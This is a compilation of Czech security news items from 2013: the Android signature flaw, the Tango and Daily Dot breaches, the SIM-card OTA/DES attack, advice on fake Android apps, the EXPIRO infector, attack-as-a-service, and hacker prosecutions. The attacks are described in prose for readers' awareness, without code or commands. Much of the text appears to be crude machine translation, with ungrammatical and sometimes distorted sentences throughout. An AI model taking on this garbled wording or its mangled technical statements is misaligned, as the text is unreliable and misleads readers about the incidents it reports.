Android aplikace musí být digitálně podepsán. To umožňuje, aby jeden zajistila kódu v aplikaci nebylo manipulováno s, a také zajišťuje kódu byla poskytnuta úředním vydavatele. Navíc Android využívá app úrovni oprávnění systému, kde každá aplikace musí přiznat a přijmout oprávnění k provedení citlivé úkoly. Digitální podpis brání aplikací a jejich doprovodné oprávnění od uneseno.

Tento závažný Android chyba zabezpečení umožňuje útočníkovi skrýt kódu v legitimní aplikace a využití stávajících oprávnění k provádění citlivých funkcí prostřednictvím těchto aplikací. Podrobnosti o zranitelnosti lze nyní nalézt na internetu a jsou velmi snadno implementovat.

Injekční škodlivého kódu do legitimních aplikací byla obyčejná taktika se zlými úmysly app tvůrci na nějakou dobu. Nicméně, oni předtím potřeba změnit i aplikace a název vydavatele, a také podepsat Trojanized aplikace s vlastním digitálním podpisem. Někdo, kdo zkoumal app údaje mohly okamžitě realizovat aplikace nebyl vytvořen legitimní vydavatele. Nyní, když útočníci již není nutné měnit tyto podrobnosti digitálního podpisu, mohou volně unést legitimní aplikace a dokonce i chytrý člověk nemohl říct, že žaloba byla v novém obalu pomocí škodlivého kódu.

Přidali jsme logika zjišťování pro zranitelné stavu naší backend Norton Mobile Insight systémů a ze čtyř milionů aplikací, ještě neobjevili škodlivý využití zranitelnosti. Objevili jsme několik aplikací, které neúmyslně zneužívají křehkosti, nicméně. Tyto aplikace jsou postaveny na společné sestavení populární nástroj řetěz, který může mít za následek chybu poškozených souborů APK. Bohužel, tato chyba zabezpečení se týká 99 procent zařízení se systémem Android, a obvykle záplaty trvat nějakou dobu být nasazeny výrobců mobilních telefonů a dopravci, pokud vůbec.

Pokud byl škodlivý aplikace je zjištěna zneužití této chyby zabezpečení, budou uživatelé moci chránit instalací aplikace Norton Mobile Security . Po nainstalování aplikace Norton Mobile Security také pravidelně aktualizovat sám přidat více robustní ochranu proti této a budoucích chyb.

Díky zabezpečení BlueBox který objevil chybu.


Zvýšení škodlivého provozu DNS dotaz

24. července 2013 Hacking | Počítačový útok | Kriminalita

S ohledem na OpUSA hacktivist kampaně Solutionary zjistil, že útočníci odpovědné za předchozí DDoS útoků na finanční sektor zadlužené různé techniky k provedení kampaně, včetně SQL Injection a XSS , kromě DDoS.

73 procent míst napadených během OpUSA byly hostované na serverech Microsoft IIS Web a že 17 procent z těchto platforem v použití se spuštěnou službou IIS verze 5.0 nebo 5.1, které jsou 10 let starší, než aktuální verze služby IIS (7.5) a už ne podporován Microsoft. Tento dohled vlevo jasné a zřejmé, otvory pro útočníky na využití. Za zmínku stojí uvést, že zatímco Spojené státy na špičce seznamu zemí s servery postižených, na 38 procent, pouze Čína stála od zbytku jako cíl této kampaně. PRISM NSA Projekt zpravodajství dominovala od The Guardian poprvé rozbil příběh. Reakce mezi bezpečnostní profesionály , průmyslovými členů a veřejnosti byl smíšený. NSA prohlášení tvrdí, částečně, že PRISM sbírá data přímo ze serverů poskytovatelů služeb v USA, včetně společností Microsoft, Yahoo!, Google, Facebook, AOL, Paltalk, Skype, YouTube a Apple, ovšem v této době, když Solutionary poznamenal, obavy o bezpečnost a soukromí informací, zejména z neamerických organizací, ale nezaznamenali vliv na klientských operací. Solutionary také shrnul výrazný nárůst škodlivých DNS dotazů a DoS činnosti. Opět platí, že USA a Čína jsou dva nejlepší země původu, registrace 57 procent a 30 procent, respektive, následované Francií a Ruskou federací. Zvýšení DDoS útoků je pravděpodobné, předpověď na základě zpravodajských informací získaných od pozorovaného průzkumných a těžebních kampaních soukromé a komerční poskytovatelé hostingu. "Pozorování Výzkumného Engineering Security Team (SERT) během posledních několika měsíců vedly k závěru, že hacktivist útoky jsou na vzestupu a že titulek řízené bezpečnostní obavy může často trvat pozornost od oprav, které mohou zlepšit defenzivní postoje, "řekl Rob Kraus, ředitel výzkumu, SERT. "Bezpečnost a riziko profesionálové čtení této zprávy, zjistíte, že existuje několik jednoduchých kroků, které mohou být lépe bránit proti zjištěným útoky."


Syrští hackeři hit Tango, The Daily Dot

23. července 2013. Hacking

Pro-Assad hacker skupina Syrská armáda Elektronický tvrdí , že porušil záložní databázi Tango, společnost za populární stejnojmenné aplikace, ak exfiltrated 1,5 TB denních Back-UPS, BBC zprávy .

The Back-UPS zřejmě obsahovat informace jako jsou kontaktní údaje, telefonní čísla a e-mailové adresy společnosti 120 milionů registrovaných uživatelů, a hacker skupina oznámila, že bude sdílet uvedené informace se syrskou vládu. Byly mezi nimi i několik screenshotů zálohování složky a jeden z protokolu Tango App prokázat svá tvrzení. Společnost potvrdila na Twitteru, že "došlo k narušení počítačové, která vyústila v neoprávněnému přístupu k některým údajům," ale ještě se podělit další podrobnosti. Oni jen dodali, že "pracují na zvýšení jejich bezpečnostních systémů." O několik dní později, skupina vyslala denního tečka tweetu požadující odstranění karikatura Asada doprovázející článek o hack Tango. Poté, co odmítl vyhovět, SEA nejprve vloupal do účtu Gmail jednoho z jejích zaměstnanců, pak se do této lokality administračního panelu a odstranil dotčený článek úplně. Soudě podle screenshotu e-mailu obdrží kádru, Daily Dot zaměstnanců byla informována o potenciální hrozbu dostat hacknutý skupiny, ale nepomohlo to - kádru má pravděpodobně spadl na e-mail kopí phishing a předal své pověřovací listiny přihlašovací e-mail - a možná ti na admin panel - pro útočníky.


Únos SIM karty pomocí Over-The-Air aktualizace

23.července 2013 Mobil | Hacking

Všichni víme, že mobilní telefony byly předmětem zločinci na chvíli teď. Ale Trojanized mobilní aplikace jsou jen jednou Scénář útoku. Některé problémy leží ještě hlouběji do telefonu. Karsten Nohl, německý vědec, který udělal hodně práce s GSM sítí a mobilních telefonů v minulosti, našel kritickou zranitelnost připojený do mobilních telefonů.

Cílem útoku je SIM karta (Subscriber Identification Module), který je přítomen ve všech mobilních telefonech. Tato čipová karta je zodpovědný za jedinečné identifikační číslo známé jako IMSI (International Mobile Subscriber Identity), a také pro manipulaci s šifrování při komunikaci s telefonní sítí. Nohl zjistil, že mnoho SIM karty, namísto použití AES nebo alespoň 3DES, nadále používat šifrování DES standard, který je známo, že jsou slabé a snadno rozbitné s dnešním hardwaru.

Útočník může poslat chytře vytvořený tichý binární SMS aktualizační zprávu přes-the-air (OTA) do mobilního telefonu, a to i bez znalosti privátní podpisový klíč. Přístroj odmítne nepodepsaný zprávu, ale bude to také odpověď s chybovým kódem byla podepsána s 56bitovým DES soukromého klíče. To umožňuje útočníkovi rozlousknout soukromý klíč pomocí brute-force útok. Při testech, Nohl byl schopen zlomit klíč během několika minut pomocí rainbow tables.

Jakmile je klíč známý, útočník může jít dopředu a podepsat škodlivého softwaru aktualizace, které jsou v podstatě mini Java applety, a poslat je přes OTA aktualizace na mobilní telefon. Vzhledem k tomu, podpis odpovídá, budou spouštěny na zařízení. Tyto škodlivé applety mohou tiše posílat prémiové SMS zprávy, které budou vytvářet zisk pro útočníka, nebo odhalit geo-umístění zařízení.

To samo o sobě by bylo dost špatné, ale bohužel některé SIM karty jsou poskytovatelé mají další zranitelná místa v rámci jejich implementace Javy, což má za následek škodlivé Java applety byly schopny vymanit se z karantény. Proto je applet může přečíst informace z jiných appletů, nebo dokonce vyjmout hlavní klíč, který se používá k odvození šifrovací klíče pro hlasovou a datovou komunikaci. S více a více funkcí, jako jsou mobilní platební systémy, se spoléhat na SIM kartu to dělá tuto chybu zabezpečení, o to více znepokojující, protože má potenciál pro zneužitelná.

Nohl odhaduje, že na celém světě miliony zařízení jsou náchylné k tomuto útoku. Telekomunikační poskytovatelé byli informováni a některé již začaly filtrovat takové zprávy OTA od sítě. Uživatelé mohou s jejich poskytovatelem, zda jejich SIM karta je zranitelné vůči tomuto útoku, a pokud je to nutné, proveďte upgrade na novější kartu, na které není zranitelný. Výzkum v oblasti bezpečnosti Labs odhalí další podrobnosti o zranitelnosti v průběhu následujících bezpečnostních konferencích, z nichž budeme reportovat živě.


Je vaše nová aplikace, jak to vypadá? Jak rozpoznat nejnovější Android podvody
Zaslal: 22 červenec 2013 05:10 PDT
Hacking
Špinění "špatné" aplikací na Android není vždy jednoduché - u zločinci hledání nových triků každý měsíc oklamat telefonu a tabletu uživatele do stahování malware.

I když použijete "bezpečné" obchody, jako je Google Play nebo Amazon App Store, je to ještě možné, aby se ošizen - nebo ještě něco horšího. I když aplikace vypadá jako jeden víte, a má pěti-hvězdičkový hodnocení, mohlo by to být nebezpečné. Android malware je na vzestupu na celém světě v letošním roce - jen v jednom "očištění" svého Play Store, Google odstranil 60000 "špatné" aplikace. ESET Security Evangelist Stephen Cobb analyzuje některá rizika v podrobném blogu zde.

Níže jsou uvedeny některé z varovných příznaků, měli byste dávat pozor před stažením nové aplikace.

Dejte si pozor, pokud aplikace čekáte na dorazí brzy

Počítačoví zločinci číst zprávy - a cílové falešné verze aplikací kolem data vydání reálných, netrpělivě očekávaná aplikace. Například, podvodníci vydala verzi BBM - BlackBerry instant messenger software - na údajnou datum vydání softwaru na Android letos. BlackBerry předtím řekl, že pověst byla špatně - ale to nezachrání 100.000 uživatelům stažení aplikace, který vydal nechtěné reklamy uživatelům, a nevyšel vůbec.

Dejte si pozor na "free" verze známých aplikací

Prediktivní psaní aplikace SwiftKey zaznamenává stisky kláves "učit se" vaše styl psaní - tak to bylo jen přirozené, že zločinci by to pirát, a přidat keylogger, který používá funkci ukrást vaše soukromá data místo. "Free" verze aplikace se objevily rychle na pirátských stránkách - infikování uživatele tak hloupý ke stažení. Stránky, které nabízejí "zdarma" APKs slavných, nejprodávanější aplikace může nabídnout stejné aplikace, ale upraven tak, aby přidat další funkce, včetně adware a programy zaznamenávající stisky kláves. SwiftKey vlastní zpráva zdůrazňuje, jak snadné je se zmást.

Příliš dobré, aby to byla pravda? Je to asi je
Android uživatelé dožadovali verzi hry hit PC FTL - takže když jeden vyskočila na Google Play, lidé stáhli. Aplikace dokonce vysokou hvězdiček - ale jen proto, že uživatelé nuceni dát vysoké hodnocení před stažením. To byl rychle odstraněn, ale ne dříve, než stovky uživatelů byli oklamáni. FTL vývojáři již dříve řekl, že by se žádná verze Android. Pokud se něco objeví, že se zdá být sen, přečíst recenze a vyhledávání mimo obchodě kupujete na - jinak byste mohli být za noční můru.

Myslíš, že jako jste nakupování na eBay

Ne všechno na Play Store Google lze důvěřovat - aplikace nejsou schváleny před objevit na prodejně. To znamená, že některé "scammy" nebo Trojanised apps objeví na Play. Klíčem k úspěchu je, že jako jste nakupování na neregulovaném trhu, jako je eBay. Existují dobré hodnocení pro tuto aplikaci? Ještě vývojáři nějaké jiné aplikace? Co jejich webové stránky vypadat? Co znamenají recenze říct? Aplikace bez jakýchkoli hvězdných hostů jsou většinou špatné zprávy.

Nenechte se zmást tím stránkách "výhodné"

Existují tisíce stránek, které nabízejí "zdarma" Android Apps - mnohé z nich se tváří jako stránky "recenze", kde se přezkum ve skutečnosti zkopírovat a vložit z popisu Google Play, a na webu je cílem nalákat vás do stahování "free" verze aplikace. Jakékoli stránky nabízející zdarma APKs populárních titulů Android by měly být považovány s extrémním podezřením. Pokud se budete držet na webové stránky, jako je Google Play, Amazon App Store a GetJar, budete mít mnohem bezpečnější - i když "špatné" aplikace mohou ještě dostat do nich.

Dobrá aplikace může "obrátit špatnou"

Dávejte si pozor na In-App nákupy - některé aplikace používat k přímé uživatele na nebezpečné stránky. Nedávná aplikace pro Android (od odstranit) nabídl uživatelům výběr písma, z nichž všechny byly k dispozici jako In-App nákupy -, ale i odkazy na stažení uvedlo, že byly ke stažení z Google Play, se ukázal místo na vzdáleném místě, a stáhnout spyware na stroj. Buďte si absolutně jistý, kde kupujete od.

Pročtěte si každý App oprávnění

"App oprávnění" obrazovka, která se objeví při instalaci nové aplikace, je důležité - nevynechávejte za ně. Spammy nebo scammy aplikace bude požadovat přístup k velkému množství informací - všechny vaše textové zprávy, nebo všechny síťové komunikace. Pokud aplikace požaduje velké množství informací, a je to jen spořič obrazovky, budík nebo foto editor, neinstalujte.

Nepředpokládejte, pěti-hvězdičkové hodnocení znamená, že je v pořádku

Stojí za to si udělali čas na přečtení pár recenzí - některé spammy apps "síla" Uživatelé dát pět hvězdiček před stažením, aby se vám jeví vysoce hodnocen. Pokud budete číst recenze kanálu, když uvidíte, že je plný uživatelů zuřivý nad tím, že podvádí.

Google je "Ověření Aplikace" může pomoci

Ověřit aplikace byla zavedena v Android 4.2 - a je to užitečné, poslední linii obrany proti scammy aplikací nebo trojské koně. To může být povolen v nastavení, bezpečnosti - a nabízí varování, pokud aplikace mohou poškodit vaše zařízení. Je také třeba poznamenat, že zároveň umožňuje zařízení pro instalaci aplikací z neznámých zdrojů mohou být užitečné - například, pokud vaše pracoviště "tlačí" ven pracovní aplikace - je to bezpečnější, aby tuto možnost vypnout, dokud ji budete potřebovat.

Příspěvek je vaše nová aplikace, jak to vypadá? Jak rozpoznat nejnovější android podvody poprvé objevil na Žijeme zabezpečení.


"Obrovsky významná" SIM karta zranitelnost opustí miliony mobilních telefonů v ohrožení
Zaslal: 22 červenec 2013 03:44 PDT
Zranitelnosti | Hacking | Mobil
Miliony SIM karet v použití dnes jsou náchylné k hackování - umožňuje útoky, kde by SIM karty lze klonovaných dálku nebo hlasové čísla mohou být změněna, podle německé bezpečnostní výzkumník.

Zranitelnost používá Sedmdesátá léta-éra šifru ještě používá na milionech SIM karet po celém světě, podle Karsten Nohl a bezpečnosti výzkumných laboratoří. Nohl výzkum budou prezentovány na konferenci o bezpečnosti v BlackHat v Las Vegas na 31. července. Karsten Nohl říká: "S více než sedm miliard karet v aktivním používání může být i SIM karet nejrozšířenější bezpečnostní klíč na světě."

"Můžeme špehovat na vás. Známe své šifrovací klíče pro volání. Můžeme číst vaše SMS. Více než jen špionáže, můžeme krást data z karty SIM, mobilní identity a náboje do svého účtu ", Nohl řekl v rozhovoru pro New York Times.

Existuje šest miliard mobily v současné době používají - a mnozí stále používat zastaralé šifrování DES. Nohl testováno 1000 SIMS více než dva roky, a zjistil, že zhruba jedna čtvrtina byli zranitelní. OSN Mezinárodní telekomunikační unie přezkoumala výzkum a popsal ho jako "velmi významný". Generální tajemník ITU Hamadoun Touré řekl: "Tyto výsledky ukazují nám, kde bychom se mohli ubírat, pokud jde o kybernetické rizik."

Nohl tvrdí, že over-the-air aktualizace softwaru - odeslat jako kryptograficky zabezpečených SMS zpráv - pomocí vlastního softwaru Java, představuje "kritickou hacking riziko." Hackeři pošle nesprávně podepsaný příkaz OTA - ale karty odpoví kryptografického podpisu, který mohou být vyřešeny na 56-bitový klíč na "standardní počítač", a pozdní proliferace Nohl. To umožňuje útočníkovi nainstalovat Java applety.

Nohl říká: "Java applet může vymanit se z jeho oblasti a přístup zbytek karty. To umožňuje vzdálený klonování možná miliony SIM karet, včetně jejich mobilní identity (IMSI, Ki), stejně jako platební pověření uložených na kartě. Applety mohou posílat SMS, hlasové pošty změnit čísla a dotaz na polohu telefonu, kromě mnoha jiných předdefinovaných funkcí. Tyto schopnosti samy o sobě poskytují dostatek potenciálu pro zneužívání. "

Nohl říká, že obrovské množství karet "starších" SIM v použití znamená, že problém může být komplikovaná. Nové gnerations karet by měly být navrženy tak, aby odolat takové útoky, říká, ale mobilní telefony a sítě by také měly přijmout obrany.

"Karty je třeba použít state-of-art kryptografie s dostatečně dlouhými klíči, neměly zveřejňovat podepsané holé útočníkům, a musí zavést bezpečné Java virtuální stroje. Zatímco některé karty již téměř tohoto cíle, v letech potřeboval nahradit zranitelné starší karty vyžadují dodatečné obranu, "říká Nohl.

Post "obrovsky významné" SIM karta zranitelnost opustí miliony mobilních telefonů v ohrožení se objevil na prvním místě Žijeme zabezpečení.


Možnost průniku do Google Glass je jen drobnost

Naše soukromí, a to už nejen to online, ohrožuje spousta dalších věcí. S tím, jak internet proniká v podstatě všude, přináší s sebou kromě řady výhod i narůstající množství hrozeb. Od bující počítačové kriminality po rozšířený dohled státu.

Hacking

Nedávná zpráva o tom, že i do chytrých brýlí Google Glass je možné proniknout bez vědomí majitele, asi překvapila málokoho. Pokud se tedy útočník zmocní systému počítače na tělo, může jeho prostřednictvím zasahovat nejen do soukromí majitele, ale i do soukromí všech, které má na dohled. Potom se nabízejí různé scénáře. Pokud totiž bude zneužitelnými počítači na tělo – které opravdu zneužity budou a navíc budou i zapojeny do jakési obdoby klasického botnetu – vybavena významná část populace, nebude pak třeba problém sledovat libovolnou osobu, která se pohybuje na veřejnosti. Možností je opravdu mnoho a omezuje je jen naše fantazie.

Jak už to s technologiemi bývá, každou, která je prvotně vyvíjena jako lidstvu prospěšná, je možno dříve nebo později zneužít. I když se politici tváří, že podobné technologie sváží dostatečnou legislativou, Google ani nikdo jiný nemůže nikdy zaručit, že jeho zařízení nikdo nezneužije. Zneužitím je myšleno jak vědomé zneužití majitelem, který může například fotografovat nebo natáčet ostatní lidi kolem sebe v nejrůznějších situacích, tak průnik útočníka do systému. Zatímco to první mohou výrobci ovlivnit potřebou nějaké zjevně signalizace, že majitel počítače na tělo právě fotografuje nebo natáčí, druhý případ je zcela mimo jejich možnosti.

Útočníci – nebo vládní organizace – mohou do přístrojů proniknout buď násilím, nebo mohou vytvořit nějakou aplikaci, která kromě inzerované funkce bude také tajně dodávat různé informace svému tvůrci. Tyto programy se sice v převážné většině nedostanou do oficiálních obchodů s aplikacemi pro jednotlivé operační systémy, ale existují i další způsoby distribuce, u kterých žádné bezpečnostní kontroly neexistují.

Teď už víme, že systém Android pro Google Glass není nezranitelný. Stejně jako všechny ostatní operační systémy. Musíme s tím proto počítat a zařídit se podle toho. Nic jiného nám nezbývá.


Soubor infikuje EXPIRO hity USA, krade přihlašovací údaje FTP
21.07.2013 Hacking | Zranitelnosti | Viry
Neobvyklý útok byl spatřen ve volné přírodě, pomocí nečekanou kombinaci hrozeb. Tento útok používá využívat sestavy (zejména Java a PDF exploit) dodat souborů škodlivin na zranitelné systémy. Je zajímavé, že tyto soubory škodlivin mít k dispozici postupy úniku informací, což je chování, není obvykle možné nalézt mezi soubory škodlivin. Jedná malware jsou součástí rodiny PE_EXPIRO, že soubor škodlivin byl poprvé spatřen spatřen v roce 2010. . Kromě standardních rutin souborů infekce, varianty viděné v tomto útoku také rutiny úniku informací, neobvyklé rutina souborů škodlivin infekce řetěz zní asi takto:
 

Uživatel je lákal na škodlivé stránky, která obsahuje exploit kit. Několik exploity jsou používány, jeden z nich je exploit Java (detekován jako JAVA_EXPLOIT.ZC), který používá CVE-2012-1723. Další chyba Java (CVE-2013-1493) je také používán. PDF exploit je také používán s škodlivého souboru PDF detekované jako TROJ_PIDIEF.JXM.
Ať už se používá exploit, konečný výsledek je stejný: matka infikuje soubor (ať už PE_EXPIRO.JX-O, PE_EXPIRO.QW-O, nebo PE64-EXPIRO-O pro 64-bitové systémy) do postiženého systému.
Jakmile se na postiženém systému, hledá. EXE soubory v systému infikovat. Všechny složky ve všech dostupných jednotek (odnímatelné, sdílené síťové) jsou podrobeny vyhledávání. Infikované soubory jsou detekovány jako PE_EXPIRO.JX.
To krade systémové a uživatelské informace, jako je například Windows Product ID, disku, sériové číslo, verze pro Windows a pověření přihlášení uživatele. To také krade uložené FTP pověření od klienta FileZilla FTP.
Ukradené informace jsou pak uloženy v. DLL soubor a nahrát na různé velení a řízení (C & C) servery.
Zde je diagram z výše uvedeného řetězce, pomocí exploit Java jako příklad:
 

Asi 70% z celkového počtu infekcí je ve Spojených státech. Je možné, že tento útok měl krást informace od organizací nebo ohrozit webových stránek, jako zvláštní zaměření na FTP pověření naznačuje buď bylo možné. Kombinace použitých hrozeb je velmi neobvyklé a naznačuje, že tento útok nebyl off-the- . police útok, který se používá běžně dostupné počítačové trestné činnosti nástroje Autor: Rhena Inocencio, Threat Response inženýr Trend Micro. Doplňující analýza Dexter, Kai Yu a Jethro Bacani.


Škodlivý URL v zóně. Lc
Dmitry Bestuzhev
20. července Incidenty | Hacking
Při analýze podezřelých adres URL Zjistil jsem, že stále více a více nebezpečné adresy URL, jsou zasílány z . lc domény, které formálně patří do Santa Lucia se nachází v zemi, ve východní části Karibského moře. Naše statistiky potvrzují tento trend.
 

Počítačoví zločinci z různých míst na světě aktivně využívají tuto doménu, včetně zločinců z Brazílie, kteří zneužívají Zdarma web hosting k dispozici v této zemi.

Kolik legitimní domén v zóně. Lc jste někdy navštívit ve vašem životě? Je-li odpověď je nulová, takže možná je na čase začít filtrování přístupu k této oblasti, zejména pokud jde o firemní firewall / proxy vrstvy.


Manažer bezpečnosti: Zločinci jsou už uvnitř

Minulý pátek, když jsem dokončoval práci v kanceláři a připravoval se na víkend, jsem udělal děsivý objev. Začalo to varováním od systému IDS a skončilo zjištěním potíží na jednom z našich firemních firewallů – dost vážný problém.

Hacking | Incidenty

Jednou z věcí, na kterých jsem v poslední době pracoval, je budování nového síťového systému detekce narušení (IDS). Bylo to v mých plánech zabezpečení již nějakou dobu, ale omezení našeho nového rozpočtu projekt zbrzdilo.
Nasazení našich senzorů IDS vyžadovalo kombinaci taktiky strašení (což nerad používám, ale zlé časy volají po zoufalých opatřeních), outsourcingu a staromódního postupu „udělej si sám“. Za posledních několik týdnů jsem postupně dosáhl pokroku.
Senzory IDS jsou nainstalované a výsledky své činnosti hlásí systému SIEM (Security Incident and Event Management), který zjišťuje souvislosti mezi všemi záznamy v logech ze síťových zařízení, serverů, antivirových systémů a dalších technologií a generuje případná varování. Je to úžasný systém, a protože jeho realizace nebyla příliš drahá, poskytuje „za babku“ hodně muziky.

Tento pátek odpoledne jsem tedy procházel varování vygenerovaná novým systémem a našel jsem něco zvláštního: velký počet připojení vzdálené plochy z internetu do některých počítačů v naší interní síti.
Kolega Mathias Thurman nedávno ve svém článku uváděl vzdálenou plochu jako „pravděpodobně nejrozšířenější metodu neoprávněného přístupu“. Nebylo to tedy něco, co bych očekával jako příchozí komunikaci z internetu.
Zpočátku jsem si myslel, že to musí být falešný poplach nebo že to možná byla jen špatně navržená přístupová metoda pro nějakého vzdáleného dodavatele. Jinak řečeno jsem nevěřil, že by to mohlo ve skutečnosti probíhat tím nejhorším způsobem.
Po bližším přezkoumání se ukázalo, že zmíněná připojení ke vzdálené ploše byla realizována z jiné země – z té, která nedávno plnila titulky novin v souvislosti se státem podporovanými síťovými útoky vůči některým významným firmám. A tato země se nyní připojuje k počítačům naší společnosti!
Bylo to to poslední, co bych chtěl v pátek odpoledne zjistit! Nemohl jsem odejít, aniž jsem přesně věděl, co se děje. Zašel jsem tedy za správcem sítě. (V naší společnosti jsou firewally považovány za součást infrastruktury sítě a jako takové jsou spravovány síťovým týmem.)
Řekl jsem mu, že potřebuji vidět konfiguraci zásad firewallu chránícího tyto počítače. Tuto informaci mi poskytl během pár sekund, a přestože jsem si myslel, že jsem připraven na nejhorší, zažil jsem obrovský šok.
Konfigurace firewallu obsahovala několik pravidel typu ip-any-any. To pro několik počítačů v naší interní síti znamenalo, že se k nim mohl připojit každý počítač z internetu pomocí libovolného protokolu – jinými slovy, firewall byl otevřen zcela dokořán asi pro 16 počítačů v naší firemní síti.
S uvedeným otevřeným pravidlem vlastně ani nelze mluvit o tom, že byste měli firewall, protože umožňuje stejné přenosy, jako by byly možné při nechráněném přímém připojení síťového kabelu do internetu.
Pokud o firewallech něco víte, je vám asi jasné, jaký pocit hrůzy jsem zažil. Pokud ne, myslím, že vám to nedokážu dostatečně popsat, ale je to v podstatě moje nejhorší noční můra.
Naše síť měla obrovskou díru, kterou využili nepřátelští útočníci. Bylo to jako mít spíž a najít otvor ve zdi, kterým vám tam chodí zvířátka ujídat a znečišťovat vaše zásoby jídla.
Poslal jsem správce sítě okamžitě uzavřít díry ve firewallu a zahájil jsem audit konfigurací na všech našich firewallech. Samozřejmě že jsem audit konfigurací našich firewallů dělal pravidelně, ale s nedostatkem zaměstnanců a zdrojů jsem to nebyl schopen dělat dostatečně často. Uvedené problematické změny přitom vznikly poměrně nedávno.
Myslím, že z této zkušenosti plyne mnoho ponaučení a jedno z nich je „nevěřit nikomu“.


Útoky AaaS: Attack as a Service

Různé ilegální služby zahrnují například útoky na zadanou počítačovou infrastrukturu či přímý pronájem nebo koupi botnetů.

Hacking | Počítačový útok

Cloudové služby přinášejí možnost zjednodušit vlastní infrastrukturu a výrazně snížit náklady na její provoz. Tato možnost oslovuje každého, kdo rozhoduje o nějaké společnosti, bez ohledu na její velikost a segment, ve kterém působí.

Platí to i pro svět kriminálních organizací. Některé z nich zcela komercionalizovaly své služby a nabízejí něco, co se zcela vážně dá označit za AaaS, Attack-as-a-Service. Jde různé ilegální služby, například útoky na zadanou počítačovou infrastrukturu či přímý pronájem a koupi botnetů, které „zákazník“ dostane k dispozici a může sám řídit například útoky DDoS na adresy dle vlastní volby.

Posledním příkladem tohoto trendu je čínská skupina, která spustila službu IM DDOS, kde si zájemci mohou logovat a objednávat útoky DDoS. Podle bezpečnostní firmy Damballa využívá IM DDoS poměrně velký botnet, který může být vážnou hrozbou pro každý cíl, snad s výjimkou těch největších a nejodolnějších provozovatelů.

Obsahu webu IM DDoS je k dispozici pouze v mandarinské čínštině, což samo o sobě značně limituje potenciální návštěvníky a zájemce. Provozovatelé (alespoň formálně) tvrdí, že mezi možné cíle patří pouze nelegitimní www servery, jako jsou různé hazardní služby. DDoS útoky na ilegální cíle nejsou zcela běžné, ale dochází k nim. Podle některých spekulací si například filmová studia či jiní majitelé mediálního obsahu občas objednávají útoky na weby, které nelegálně nabízejí jejich majetek. Je to možná metoda, jak přinejmenším dočasně znepřístupnit takovou nabídku.

Jak se zdá, tak pronájem hackera či crackera je poměrně levná záležitost – může to stát méně než večeře v lepší restauraci. Některé weby nabízejí získání e-mailových hesel do 48 hodin za 150 až 400 dolarů. IM DDOS svým zákazníkům vychází vstříc a řadu jednodušších služeb nabízí zdarma v rámci svých „prémiových produktů.“

Zmiňovaný provozovatel AaaS funguje jako regulérní organizace, komunikace se zákazníky zahrnuje SLA (service level agreement), předplatné, množstevní slevy a dokonce i linku technické podpory pro VIP zákazníky. Ta je ovšem anonymní a tajná, podpora většinou probíhá prostřednictvím čínské služby pro instantní komunikaci QQ..

Podle firmy Damballa malware, který buduje botnet používaný organizací IM DDOS, není ničím zvláštní a jeho komunikaci lze poměrně snadno detekovat. a tedy bránit jeho šíření. Nicméně současná velikost – hrubá síla – botnetu je již znepokojivá a může způsobovat problémy i v případě, že jeho další růst bude zastaven.

Trend AaaS představuje vážnou záležitost, která ukazuje, do jaké míry se kriminální podsvětí profesionalizuje a organizuje kolem moderních technologií. Stejně tak je třeba si uvědomit, že v případě Internetu již nejsou různé gangy hrozbou pouze pro své bezprostřední okolí, vliv i těch nejmenších se doslova internacionalizoval a pokud se jim podaří vyvolat explozivní růst nějakého botnetu, mohou ohrozit v podstatě kohokoli a kdekoli.


Pirate Bay zakladatel podezření z hackerských policejních databází

07. června 2013. Hacking

Pirate Bay spoluzakladatel Gottfrid Svartholm, který byl vydán z Kambodže do Švédska zodpovídat za údajně hacking švédské IT společnosti Logica a Nordea bank mainframe byl jmenován jako podezřelý v jiném případě vniknutí. Spolu s nejmenovaný 20-letý Dánský občan, je Svartholm myslel to, že porušil a stáhnout velké množství souborů z mainframe systémů, společnost CSC za úkol udržet a manipulaci citlivé informace patří do dánské policie, jakož i dánského daňového úřadu a modernizace agentury. Podle k tiskové zprávě (přes Google Translate) vydané policií ve čtvrtek, má osobní identifikační čísla, records řidičů, a další byl napaden, ale není tam žádný důkaz, že útočníci použili ukradené informace libovolným způsobem. Hackeři mají údajně také přístup do Schengenského informačního systému - používá pohraniční stráže, policie, celní orgány, víza a soudní orgány v celém schengenském prostoru -., a informace o hledaných osobách v něm obsažených Útoky byly provedeny v období mezi dubnem a srpnem 2012, a podle Zaregistrovat se dánská policie objevili poté, co byl upozorňován švédské policie, který našel v Dánsku IP adresy těch, zjištěných v útoku Logica.


Anonymous hacker Jeremy Hammond přizná
29. května 2013. Hacking

Jeremy Hammond (aka "Anarchaos"), anonymní hacker, který byl obviněn loni zločinů týkajících se v prosinci 2011 hack strategického prognózování ("Stratfor") a veřejné šíření informací získaných prostřednictvím tohoto hack, se přiznal v úterý. " Tento nespolupracující námitka dohoda uvolní, abych světu, co jsem udělal a proč, aniž by odhalil nějaké taktiky nebo informace vládě a aniž by byly ohroženy životy a blaho ostatních aktivistů a offline, " napsal 28-rok- let v důsledku jeho prosbě. "Teď, když jsem se přiznal, že je to úleva, aby mohli říct, že jsem udělal práci s Anonymní hack Stratfor, mimo jiné webové stránky. Tyto další součástí vojenské a policejní zařízení dodavatele, vlastní inteligencí a firmy v oblasti bezpečnosti informací a donucovacích orgánů. Udělal jsem to, protože jsem si, že lidé mají právo vědět, co vlády a korporace dělají za zavřenými dveřmi. Udělal jsem to, čemu věřím je správné. " Podle dohodě prosby , může přijmout maximální trest 10 let vězení, tři roky pod dohledem vydání, pokuta větší než 250.000 dolarů, a souhlasil, aby restituce ve výši, která nepřesáhne 2.500.000 dolarů. Všechny ostatní otevřené číslic (obsažené v dohodě prosby) se odvolává vláda. Hammond je naplánován být odsouzen v září.